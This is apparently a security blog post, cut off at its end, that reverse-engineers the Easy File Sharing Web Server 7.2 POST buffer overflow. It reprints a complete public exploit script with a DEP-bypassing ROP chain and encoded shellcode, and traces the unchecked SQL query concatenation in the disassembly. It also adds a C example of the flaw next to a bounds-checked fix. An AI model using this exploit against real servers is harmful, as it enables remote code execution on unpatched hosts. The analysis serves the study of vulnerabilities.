0x00 Preface
First, why is there no fuzzing-02... Because while writing 02 I found it was just repeating material from the first article, so I stopped halfway. But 03 is the first time I have analyzed software nobody else had analyzed and written the shellcode on my own, so I am writing it down as a reference for myself.
Target: Win7 x64 SP1
Source: Win10 (Python)
Software: Easy File Sharing Web Server (7.2), WinDbg, Immunity Debugger, IDA, msfvenom (Metasploit)
Bad characters: '\x00\x0A\x0D'
0x01 Starting to reverse the software
The start was easy, same as usual: download version 7.2, install and launch it, search Baidu for a PoC, then crash the program. Here is the PoC I found.
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP)
# Exploit Author: bl4ck h4ck3r
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows XP SP2, Windows 2008 R2 x64
import socket
import struct
import sys
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <host>\n"
exit()
# 0x1002280a : # ADD ESP,1004 # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
ret = struct.pack("<I", 0x1002280a)
# nopsled
shellcode = "\x90"*200
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
shellcode += "\x89\xe7\xd9\xec\xd9\x77\xf4\x5d\x55\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x39\x6c\x5a\x48\x6b\x32\x55\x50\x67\x70\x47\x70"
shellcode += "\x75\x30\x6e\x69\x78\x65\x65\x61\x39\x50\x31\x74"
shellcode += "\x4c\x4b\x50\x50\x46\x50\x4c\x4b\x36\x32\x36\x6c"
shellcode += "\x6c\x4b\x66\x32\x42\x34\x6c\x4b\x52\x52\x77\x58"
shellcode += "\x54\x4f\x4c\x77\x63\x7a\x31\x36\x66\x51\x4b\x4f"
shellcode += "\x4e\x4c\x47\x4c\x73\x51\x73\x4c\x76\x62\x76\x4c"
shellcode += "\x51\x30\x59\x51\x78\x4f\x46\x6d\x76\x61\x48\x47"
shellcode += "\x6a\x42\x79\x62\x50\x52\x50\x57\x4c\x4b\x63\x62"
shellcode += "\x36\x70\x4e\x6b\x30\x4a\x37\x4c\x6e\x6b\x42\x6c"
shellcode += "\x42\x31\x33\x48\x49\x73\x50\x48\x33\x31\x6a\x71"
shellcode += "\x42\x71\x4c\x4b\x63\x69\x47\x50\x45\x51\x4a\x73"
shellcode += "\x6c\x4b\x72\x69\x44\x58\x6b\x53\x67\x4a\x42\x69"
shellcode += "\x6e\x6b\x45\x64\x4c\x4b\x46\x61\x6b\x66\x35\x61"
shellcode += "\x39\x6f\x6c\x6c\x6b\x71\x58\x4f\x34\x4d\x46\x61"
shellcode += "\x6b\x77\x44\x78\x6d\x30\x71\x65\x59\x66\x64\x43"
shellcode += "\x61\x6d\x48\x78\x67\x4b\x61\x6d\x74\x64\x32\x55"
shellcode += "\x4d\x34\x42\x78\x6e\x6b\x32\x78\x44\x64\x56\x61"
shellcode += "\x68\x53\x62\x46\x4e\x6b\x36\x6c\x70\x4b\x4c\x4b"
shellcode += "\x56\x38\x35\x4c\x56\x61\x59\x43\x6c\x4b\x76\x64"
shellcode += "\x4c\x4b\x56\x61\x78\x50\x6e\x69\x61\x54\x37\x54"
shellcode += "\x55\x74\x53\x6b\x63\x6b\x63\x51\x32\x79\x71\x4a"
shellcode += "\x36\x31\x69\x6f\x4b\x50\x43\x6f\x31\x4f\x73\x6a"
shellcode += "\x6e\x6b\x36\x72\x58\x6b\x4c\x4d\x53\x6d\x52\x4a"
shellcode += "\x47\x71\x4c\x4d\x6f\x75\x48\x32\x43\x30\x53\x30"
shellcode += "\x67\x70\x32\x70\x31\x78\x34\x71\x4e\x6b\x32\x4f"
shellcode += "\x6c\x47\x39\x6f\x68\x55\x4f\x4b\x4c\x30\x68\x35"
shellcode += "\x4f\x52\x33\x66\x50\x68\x79\x36\x5a\x35\x6d\x6d"
shellcode += "\x4d\x4d\x49\x6f\x68\x55\x55\x6c\x76\x66\x53\x4c"
shellcode += "\x75\x5a\x6b\x30\x59\x6b\x59\x70\x72\x55\x33\x35"
shellcode += "\x6f\x4b\x37\x37\x76\x73\x74\x32\x70\x6f\x50\x6a"
shellcode += "\x67\x70\x50\x53\x59\x6f\x69\x45\x65\x33\x75\x31"
shellcode += "\x62\x4c\x61\x73\x46\x4e\x75\x35\x30\x78\x72\x45"
shellcode += "\x45\x50\x41\x41"
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
# 0x00000000, # [-] Unable to find gadget to put 00000201 into ebx
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0xFFFFFDFE, # -202
0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ}
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x1004de84, # &Writable location [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll]
0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
0x100218f9, # POP EBP # RETN [ImageLoad.dll]
0x61c24169, # & push esp # ret [sqlite3.dll]
0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x1001bd98, # POP ECX # RETN [ImageLoad.dll]
0x1004de84, # &Writable location [ImageLoad.dll]
0x61c373a4, # POP EDI # RETN [sqlite3.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x90909090, # nop
0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
buf = "A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send("POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=" + buf + "&getPassword=Get+Password")
s.close()
I will modify this PoC later; for now I just use it to trigger the fault and then work out why it faults. The software crashed as expected.
I had learned WinDbg before, and there was no documentation telling me where the fault was, so my first idea was to open WinDbg and look at the stack. Attach WinDbg to the process, then make the program fault again.
(a48.f2c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
ntdll!DbgBreakPoint:
00000000`77bc0590 cc int 3
0:009> g
(a48.df4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
66463766 ?? ???
0:002:x86> kb
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
044471a8 33674632 46346746 04440027 00001001 0x66463766
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
044471c4 0052d80b 0294debc 0294ffcd 0000001e 0x33674632
04447218 0042d452 0018d790 00000000 0000028c fsws+0x12d80b
0444721c 0018d790 00000000 0000028c 00000000 fsws+0x2d452
04447220 00000000 0000028c 00000000 00000000 0x18d790
0:002:x86> ub fsws+0x12d80b
fsws+0x12d7f6:
0052d7f6 8bce mov ecx,esi
0052d7f8 e817feffff call fsws+0x12d614 (0052d614)
0052d7fd 8b07 mov eax,dword ptr [edi]
0052d7ff 53 push ebx
0052d800 034510 add eax,dword ptr [ebp+10h]
0052d803 50 push eax
0052d804 ff36 push dword ptr [esi]
0052d806 e8e5eafcff call fsws+0xfc2f0 (004fc2f0)
0:002:x86> ub fsws+0x2d452
fsws+0x2d438:
0042d438 8d4d90 lea ecx,[ebp-70h]
0042d43b c645fc00 mov byte ptr [ebp-4],0
0042d43f 0f9fc3 setg bl
0042d442 e860031000 call fsws+0x12d7a7 (0052d7a7)
0042d447 84db test bl,bl
0042d449 7407 je fsws+0x2d452 (0042d452)
0042d44b 8bcf mov ecx,edi
0042d44d e8ae8cfeff call fsws+0x16100 (00416100)
Looking at the two functions and the two calls inside them, I found that the second function, fsws+0x2d452, breaks when the packet arrives, whereas the first function breaks even when no packet is sent.
With the program stopped, I did it the slow way: stepping instruction by instruction to see which function faulted, treating it as experience gained. Here I found that the program faults when execution reaches 42d44d, so this is the function we follow into.
It was fairly quick, since it is the second function inside fsws+0x2d452. Restart, follow in again; from here on it is the same routine, so I won't go into detail and will just give the call path.
fun_0042d44d->fun_0041625d->fun_0049758a->fun_004f9693->fun_00500d72
That is step one done. Now we start analyzing where it goes wrong and why.
0x02 Function reversing
First, we see in the PoC that there are two parameters, Email and getPassword, and the shellcode is in email, so we guess the overflow happens while email is processed. Note: getPassword is required; why will become clear during the reversing later.
0x02.1 (fun_0042d44d)
00416100 /$ 6A FF PUSH -1
00416102 |. 68 88F25400 PUSH fsws.0054F288 ; SE handler installation
00416107 |. 64:A1 00000000 MOV EAX,DWORD PTR FS:[0] ; the FS register points to the current thread's SEH structure; [0] is the first offset
0041610D |. 50 PUSH EAX
0041610E |. 64:8925 000000>MOV DWORD PTR FS:[0],ESP ; stores the ESP address into the SEH structure
00416115 |. 83EC 54 SUB ESP,54
00416118 |. A1 D4385A00 MOV EAX,DWORD PTR DS:[5A38D4] ; moves the data at 5A38D4 in the data area into EAX
0041611D |. 53 PUSH EBX
0041611E |. 55 PUSH EBP
0041611F |. 56 PUSH ESI
00416120 |. 57 PUSH EDI
00416121 |. 8BF1 MOV ESI,ECX
00416123 |. 894424 10 MOV DWORD PTR SS:[ESP+10],EAX
00416127 |. 8D9E 64020000 LEA EBX,DWORD PTR DS:[ESI+264] ; this address holds the address of the POST request body data
0041612D |. 68 5C8D5900 PUSH fsws.00598D5C ; ASCII "Email="
00416132 |. 8BCB MOV ECX,EBX ; copies the data address into ecx again
00416134 |. C74424 70 0000>MOV DWORD PTR SS:[ESP+70],0
0041613C |. E8 7CC81000 CALL fsws.005229BD ; processes the received parameter details: finds the address of the email parameter and returns its offset, 68
00416141 |. 8BE8 MOV EBP,EAX
00416143 |. 85ED TEST EBP,EBP
00416145 |. 0F8E 1F040000 JLE fsws.0041656A
0041614B |. BF 5C8D5900 MOV EDI,fsws.00598D5C ; ASCII "Email="
00416150 |. 83C9 FF OR ECX,FFFFFFFF
00416153 |. 33C0 XOR EAX,EAX
00416155 |. 68 4C8D5900 PUSH fsws.00598D4C ; ASCII "&getPassword="
0041615A |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0041615C |. F7D1 NOT ECX
0041615E |. 49 DEC ECX
0041615F |. 03E9 ADD EBP,ECX
00416161 |. 8BCB MOV ECX,EBX
00416163 |. E8 55C81000 CALL fsws.005229BD ; same as the function above: computes this parameter's offset in the packet, 106e
00416168 |. 2BC5 SUB EAX,EBP ; subtracts the length of email, giving the 6e that follows it
0041616A |. 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20]
0041616E |. 50 PUSH EAX ; length of email
0041616F |. 55 PUSH EBP ; offset of the getpassword parameter
00416170 |. 51 PUSH ECX ; this address records where getpassword sits in memory, i.e. how many A's precede it
00416171 |. 8BCB MOV ECX,EBX
00416173 |. E8 43C61000 CALL fsws.005227BB
00416178 |. 50 PUSH EAX ; obtained the address holding the email data address
00416179 |. 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
0041617D |. C64424 70 01 MOV BYTE PTR SS:[ESP+70],1
00416182 |. E8 59771100 CALL fsws.0052D8E0
00416187 |. 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20] ; moves this address into ecx
0041618B |. C64424 6C 00 MOV BYTE PTR SS:[ESP+6C],0
00416190 |. E8 12761100 CALL fsws.0052D7A7
00416195 |. 83CB FF OR EBX,FFFFFFFF
00416198 |. 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
0041619C |. 53 PUSH EBX
0041619D |. 6A 00 PUSH 0
0041619F |. E8 337A1100 CALL fsws.0052DBD7
004161A4 |. 50 PUSH EAX
004161A5 |. E8 26790C00 CALL fsws.004DDAD0 ; returns its length again
Then, up to 41625D, it keeps processing the packet details. At this point the packet has not yet been written onto the stack; it is held in the data area. It obtains the packet's length and locates the details of the two parameters, email and getpasswd.
0x02.2 (fun_0041625d)
0041625D |. E8 7E120800 CALL fsws.004974E0 ; starts processing the email data
Follow in:
004974E0 /$ 64:A1 00000000 MOV EAX,DWORD PTR FS:[0] ; the SEH return address, which should be the previous function's address
004974E6 |. 6A FF PUSH -1
004974E8 |. 68 51985500 PUSH fsws.00559851
004974ED |. 50 PUSH EAX
004974EE |. B8 10100000 MOV EAX,1010
004974F3 |. 64:8925 000000>MOV DWORD PTR FS:[0],ESP ; I think this section is a try: on failure it returns to the previous function and continues
004974FA |. E8 01290600 CALL fsws.004F9E00
004F9E00 /$ 51 PUSH ECX
004F9E01 |. 3D 00100000 CMP EAX,1000
004F9E06 |. 8D4C24 08 LEA ECX,DWORD PTR SS:[ESP+8]
004F9E0A |. 72 14 JB SHORT fsws.004F9E20
004F9E0C |> 81E9 00100000 /SUB ECX,1000 ; this address holds the data select * from sqltable
004F9E12 |. 2D 00100000 |SUB EAX,1000
004F9E17 |. 8501 |TEST DWORD PTR DS:[ECX],EAX
004F9E19 |. 3D 00100000 |CMP EAX,1000
004F9E1E |.^73 EC \JNB SHORT fsws.004F9E0C
004F9E20 |> 2BC8 SUB ECX,EAX
004F9E22 |. 8BC4 MOV EAX,ESP
004F9E24 |. 8501 TEST DWORD PTR DS:[ECX],EAX
004F9E26 |. 8BE1 MOV ESP,ECX
004F9E28 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
004F9E2A |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
004F9E2D |. 50 PUSH EAX
004F9E2E \. C3 RETN
This function looks up the email data in the database, building a SQL statement.
004974FF |. 53 PUSH EBX
00497500 |. 56 PUSH ESI
00497501 |. 8BF1 MOV ESI,ECX
00497503 |. 68 2C285A00 PUSH fsws.005A282C ; ASCII "sqltable"
00497508 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
0049750C |. E8 04630900 CALL fsws.0052D815
00497511 |. 8B8424 3010000>MOV EAX,DWORD PTR SS:[ESP+1030]
00497518 |. C78424 2010000>MOV DWORD PTR SS:[ESP+1020],0
00497523 |. 85C0 TEST EAX,EAX
00497525 |. 74 0A JE SHORT fsws.00497531
00497527 |. 50 PUSH EAX
00497528 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
0049752C |. E8 FF630900 CALL fsws.0052D930
00497531 |> 8B8424 2810000>MOV EAX,DWORD PTR SS:[ESP+1028]
00497538 |. 8D4C24 0C LEA ECX,DWORD PTR SS:[ESP+C]
0049753C |. 50 PUSH EAX
0049753D |. E8 D3620900 CALL fsws.0052D815
00497542 |. 8B4424 0C MOV EAX,DWORD PTR SS:[ESP+C]
00497546 |. B3 01 MOV BL,1
00497548 |. 889C24 2010000>MOV BYTE PTR SS:[ESP+1020],BL
0049754F |. 8B48 F8 MOV ECX,DWORD PTR DS:[EAX-8]
00497552 |. 85C9 TEST ECX,ECX
00497554 |. 0F8E B6000000 JLE fsws.00497610
0049755A |. 57 PUSH EDI
0049755B |. 8BBC24 3010000>MOV EDI,DWORD PTR SS:[ESP+1030]
00497562 |. 57 PUSH EDI
00497563 |. 50 PUSH EAX
00497564 |. 8D4E 10 LEA ECX,DWORD PTR DS:[ESI+10]
00497567 |. 68 5C285A00 PUSH fsws.005A285C ; ASCII " where %s='%s'"
0049756C |. 51 PUSH ECX
0049756D |. E8 D1B70800 CALL fsws.00522D43
00497572 |. 8B5424 20 MOV EDX,DWORD PTR SS:[ESP+20]
00497576 |. 8B4424 1C MOV EAX,DWORD PTR SS:[ESP+1C]
0049757A |. 83C4 10 ADD ESP,10
0049757D |. 8D4C24 1C LEA ECX,DWORD PTR SS:[ESP+1C]
00497581 |. 57 PUSH EDI
00497582 |. 52 PUSH EDX
00497583 |. 50 PUSH EAX
00497584 |. 68 3C285A00 PUSH fsws.005A283C ; ASCII "select * from %s where %s='%s'"
00497589 |. 51 PUSH ECX ; a database operation
0049758A |. E8 DB200600 CALL fsws.004F966A ; seems to be validating the data
The code above operates on our email parameter: the program builds select * from sqltable where email=shellcode. But when concatenating like this it does not check the length, which causes the overflow.
0x02.3 (fun_0049758A)
004F966A /$ 55 PUSH EBP
004F966B |. 8BEC MOV EBP,ESP
004F966D |. 83EC 20 SUB ESP,20
004F9670 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
004F9673 |. 56 PUSH ESI
004F9674 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX
004F9677 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
004F967A |. 8D45 10 LEA EAX,DWORD PTR SS:[EBP+10]
004F967D |. C745 EC 420000>MOV DWORD PTR SS:[EBP-14],42
004F9684 |. 50 PUSH EAX
004F9685 |. 8D45 E0 LEA EAX,DWORD PTR SS:[EBP-20]
004F9688 |. FF75 0C PUSH DWORD PTR SS:[EBP+C]
004F968B |. C745 E4 FFFFFF>MOV DWORD PTR SS:[EBP-1C],7FFFFFFF
004F9692 |. 50 PUSH EAX
004F9693 |. E8 A86F0000 CALL fsws.00500640
The above pushes the select statement onto the stack, then pushes some related information, to be used in the call at 004F9693. The 9693 function then starts copying the data: it first pushes the SQL statement onto the stack, then computes the length of the data, then appends it.
00500AD3 |> 8BD6 |/MOV EDX,ESI ; from here on it computes the length
00500AD5 |. 4E ||DEC ESI
00500AD6 |. 85D2 ||TEST EDX,EDX
00500AD8 |. 74 08 ||JE SHORT fsws.00500AE2
00500ADA |. 8038 00 ||CMP BYTE PTR DS:[EAX],0
00500ADD |. 74 03 ||JE SHORT fsws.00500AE2
00500ADF |. 40 ||INC EAX
00500AE0 |.^EB F1 |\JMP SHORT fsws.00500AD3
00500AE2 |> 2BC1 |SUB EAX,ECX ; the computed result is 1000
After computing the data length, concatenation begins.
Actually, I personally think 00500D72 is the handling of %s in our format string, since the earlier select also went through this function.
00500E5A |> 0FBE06 /MOVSX EAX,BYTE PTR DS:[ESI] ; esi is the argument; one byte goes into eax, i.e. the first character of the string is processed
00500E5D |. 57 |PUSH EDI ; /Arg3
00500E5E |. 46 |INC ESI ; |
00500E5F |. FF7424 1C |PUSH DWORD PTR SS:[ESP+1C] ; |Arg2 = 08F96138
00500E63 |. 50 |PUSH EAX ; |Arg1
00500E64 |. E8 75FFFFFF |CALL fsws.00500DDE ; \fsws.00500DDE after each call, one more byte has been copied
00500E69 |. 83C4 0C |ADD ESP,0C
00500E6C |. 833F FF |CMP DWORD PTR DS:[EDI],-1
00500E6F |. 74 07 |JE SHORT fsws.00500E78
00500E71 |. 8BC3 |MOV EAX,EBX
00500E73 |. 4B |DEC EBX
00500E74 |. 85C0 |TEST EAX,EAX
00500E76 |.^7F E2 \JG SHORT fsws.00500E5A
It just keeps copying, keeps filling, until it overflows.
It overflowed all the way to here, and then when the function returns at the end it faults. We can look at what this looks like in IDA; since we know its address, we just jump to it.
After checking that the value is greater than 0, it executes the function at 49758a directly. Then look at the function at 00500D72.
00500D72 doesn't check the length either: as long as it is greater than 0 it starts copying directly, which causes the overflow.
You are surely wondering why the getpassword function hasn't been covered yet; it comes up in the exploitation part (section three), because that is where I got stuck for a long time.
0x03 (Exploitation)
First construct 4096 characters. Where does 4096 come from? From a function before 0049758A.
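The bounds check the analysis above finds missing, as an added C example that is not code from fsws.exe: the query is expanded from the format string recovered in the listing, "select * from %s where %s='%s'", into a fixed 4096-byte (0x1000) stack buffer, first in the unchecked shape described here and then with the length check added. The table and column names and the MAX_EMAIL limit are assumptions for illustration.

```c
/* Added example, not code from fsws.exe: the query-building pattern the
 * analysis reconstructs, in its unchecked form and with a length check added.
 * Table/column names and MAX_EMAIL are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define QUERY_BUF 4096  /* the 0x1000-byte stack buffer identified above */
#define MAX_EMAIL 254   /* assumed application limit on the Email value */

/* Shape of the flaw: the format string is expanded into a caller-supplied
 * fixed buffer with no check of the value's length, so a value longer than
 * the buffer overruns the stack frame. Kept only for comparison; never
 * call it with untrusted input. */
int build_query_unchecked(char *out, const char *table, const char *col,
                          const char *value)
{
    return sprintf(out, "select * from %s where %s='%s'", table, col, value);
}

/* Hardened form: reject oversized values up front and let snprintf bound the
 * write, checking its return value so silent truncation is not mistaken for
 * success. Returns the query length, or -1 on rejection or truncation. */
int build_query_checked(char *out, size_t outsz, const char *table,
                        const char *col, const char *value)
{
    if (strlen(value) > MAX_EMAIL)
        return -1;
    int n = snprintf(out, outsz, "select * from %s where %s='%s'",
                     table, col, value);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz > 0)
            out[0] = '\0';
        return -1;
    }
    return n;
}

/* Handler with the frame layout seen in the debugger: a 4096-byte local
 * query buffer. Returns 0 if a query was built, -1 if the input was rejected. */
int handle_email_lookup(const char *email)
{
    char query[QUERY_BUF];
    if (build_query_checked(query, sizeof query, "sqltable", "email", email) < 0)
        return -1;
    /* the real server would now run the query; here we only build it */
    return 0;
}

/* Builds a constructed value of n 'A' characters (like the PoC padding) and
 * runs the handler on it; returns the handler's result, -2 on allocation failure. */
int lookup_with_length(size_t n)
{
    char *v = malloc(n + 1);
    if (!v)
        return -2;
    memset(v, 'A', n);
    v[n] = '\0';
    int r = handle_email_lookup(v);
    free(v);
    return r;
}

int main(void)
{
    printf("20-byte value: %d\n", lookup_with_length(20));
    printf("4999-byte value: %d\n", lookup_with_length(4999));
    return 0;
}
```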
004974FA
004F9E00 /$ 51 PUSH ECX
004F9E01 |. 3D 00100000 CMP EAX,1000
004F9E06 |. 8D4C24 08 LEA ECX,DWORD PTR SS:[ESP+8]
004F9E0A |. 72 14 JB SHORT fsws.004F9E20
004F9E0C |> 81E9 00100000 /SUB ECX,1000 ; this address holds the data select * from sqltable
004F9E12 |. 2D 00100000 |SUB EAX,1000
004F9E17 |. 8501 |TEST DWORD PTR DS:[ECX],EAX
004F9E19 |. 3D 00100000 |CMP EAX,1000
004F9E1E |.^73 EC \JNB SHORT fsws.004F9E0C
004F9E20 |> 2BC8 SUB ECX,EAX
004F9E22 |. 8BC4 MOV EAX,ESP
004F9E24 |. 8501 TEST DWORD PTR DS:[ECX],EAX
004F9E26 |. 8BE1 MOV ESP,ECX
004F9E28 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
004F9E2A |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
004F9E2D |. 50 PUSH EAX
004F9E2E \. C3 RETN
This reserves 0x1000 bytes.
Then send our constructed packet:
import httplib
